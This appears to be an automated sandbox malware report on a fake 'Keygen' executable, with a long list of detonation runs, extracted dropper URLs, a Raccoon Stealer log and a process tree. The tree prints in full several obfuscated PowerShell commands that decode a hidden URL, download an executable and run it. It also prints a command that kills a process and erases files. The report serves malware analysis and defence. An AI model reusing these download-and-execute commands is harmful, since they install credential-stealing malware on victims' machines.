Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    100s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (24) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:44:56 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (512 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (24) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (24) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\31DA.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (24) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1868
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\m.hta"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1208
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1924
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\m1.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1952
      • C:\Windows\SysWOW64\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:1800
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\b.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1972
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1044
          • C:\Users\Public\hys.exe
            "C:\Users\Public\hys.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:2484
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
              6⤵
              • Loads dropped DLL
              PID:2208
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:1424
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                  8⤵
                  • Loads dropped DLL
                  PID:2728
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2748
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      10⤵
                      • Executes dropped EXE
                      PID:1900
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:2712
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2712 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\826056704587093\\* & exit
                    9⤵
                      PID:1936
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /pid 2712
                        10⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1904
              • C:\Users\Public\hys.exe
                "C:\Users\Public\hys.exe"
                6⤵
                • Executes dropped EXE
                PID:2368
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\b1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
